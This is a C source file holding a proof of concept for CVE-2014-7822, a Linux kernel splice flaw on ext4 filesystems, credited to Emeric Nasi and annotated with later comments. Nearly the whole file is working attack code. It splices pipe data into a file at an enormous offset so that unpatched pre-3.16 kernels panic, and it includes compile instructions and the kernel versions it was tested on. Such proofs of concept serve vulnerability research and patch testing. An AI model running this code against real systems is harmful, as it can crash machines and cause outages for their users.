/* ----------------------------------------------------------------------------------------------------
 * cve-2014-7822_poc.c
 *
 * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file,
 * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call,
 * as demonstrated by use of a file descriptor associated with an ext4 filesystem.
 *
 *
 * This is a PoC to reproduce the vulnerability. No exploitation here, just a simple kernel panic.
 * Works on ext4 filesystems
 * Tested on Ubuntu with 3.13 and 3.14 kernels
 *
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c
 *
 *
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/
/* ----------------------- Includes ----------------------------*/
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <limits.h>
#define EXPLOIT_NAME "cve-2014-7822"
#define EXPLOIT_TYPE DOS
#define JUNK_SIZE 30000
/* ----------------------- functions ----------------------------*/
/* Useful:
 *
 * +============+===============================+===============================+
 * | \ File flag|                               |                               |
 * |  \         |       !EXT4_EXTENTS_FL        |        EXT4_EXTENTS_FL        |
 * |Fs Features\|                               |                               |
 * +------------+-------------------------------+-------------------------------+
 * |  !extent   |   write: 2194719883264        |   write: --------------       |
 * |            |   seek:  2199023251456        |   seek:  --------------       |
 * +------------+-------------------------------+-------------------------------+
 * |   extent   |   write: 4402345721856        |   write: 17592186044415       |
 * |            |   seek:  17592186044415       |   seek:  17592186044415       |
 * +------------+-------------------------------+-------------------------------+
 */
/**
 * PoC for the CVE-2014-7822 vulnerability
 */
int main()
{
    /*
     * Reproduces CVE-2014-7822 (see the file header): JUNK_SIZE bytes are
     * first copied from a regular file into a pipe, then spliced from the
     * pipe into a second file at an offset far past the per-file size limits
     * tabulated in the comment above. The header states that on an unpatched
     * (pre-3.16) kernel this ends in a panic; on a patched kernel the second
     * splice() is presumably rejected and the error branch below is taken
     * — TODO confirm.
     *
     * Return: 0 once the whole sequence has been issued; exit(1) if the
     * second splice() returns -1. Note that the results of pipe(), open()
     * and write() are never checked, so a failure there (e.g. the current
     * directory not being writable, or not on ext4) is silently carried
     * into the later calls as an invalid descriptor.
     */
    int pipefd[2];
    int result;
    int in_file;
    int out_file;
    int zulHandler;
    loff_t viciousOffset = 0;

    /* 30000-byte stack buffer; the -fno-stack-protector flag given in the
     * header presumably relates to this array — TODO confirm */
    char junk[JUNK_SIZE] ={0};

    /* pipe() result is stored but never checked; `result` is overwritten below */
    result = pipe(pipefd);

    /* Create (or truncate) zul.txt and zug.txt in the current directory via
     * the shell. The commands are fixed strings, not built from any input,
     * but `cat` is still resolved through the shell's PATH. */
    system("cat /dev/null > zul.txt");
    system("cat /dev/null > zug.txt");

    /* Fill zul.txt with JUNK_SIZE bytes of 'A'. open() and write() results
     * are not checked. */
    zulHandler = open("zul.txt", O_RDWR);
    memset(junk,'A',JUNK_SIZE);
    write(zulHandler, junk, JUNK_SIZE);
    close(zulHandler);

    /* Move the content of zul.txt into the pipe. The `0` passed as off_in
     * is a null pointer, so the file's own position is used (per splice(2));
     * the pipe end takes no offset. */
    viciousOffset = 0;
    in_file = open("zul.txt", O_RDONLY);
    result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);
    close(in_file);

    /* Splice the pipe content into zug.txt at viciousOffset. */
    out_file = open("zug.txt", O_RDWR);
    viciousOffset = 118402345721856; // ~108 TB target offset; per the original note it can go as high as the "false" 250 PB ext4 file size
    /* loff_t is cast to unsigned long to match %lu: exact on LP64, but the
     * value above exceeds 32 bits and would be truncated on ILP32 targets. */
    printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset);

    /* This is the splice_write call the CVE is about. The number in the
     * trailing comment is carried over from the original source; its
     * purpose is not stated there (presumably another offset that was tried). */
    result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615
    if (result == -1)
    {
        /* The only failure that is reported: errno/strerror from splice(). */
        printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno));
        exit(1);
    }
    close(out_file);

    close(pipefd[0]);
    close(pipefd[1]);

    /* Open and immediately close zug.txt. The original does not say why this
     * extra open is needed — presumably to touch the file once more. */
    in_file = open("zug.txt", O_RDONLY);
    close(in_file);

    printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n");

    return 0;
}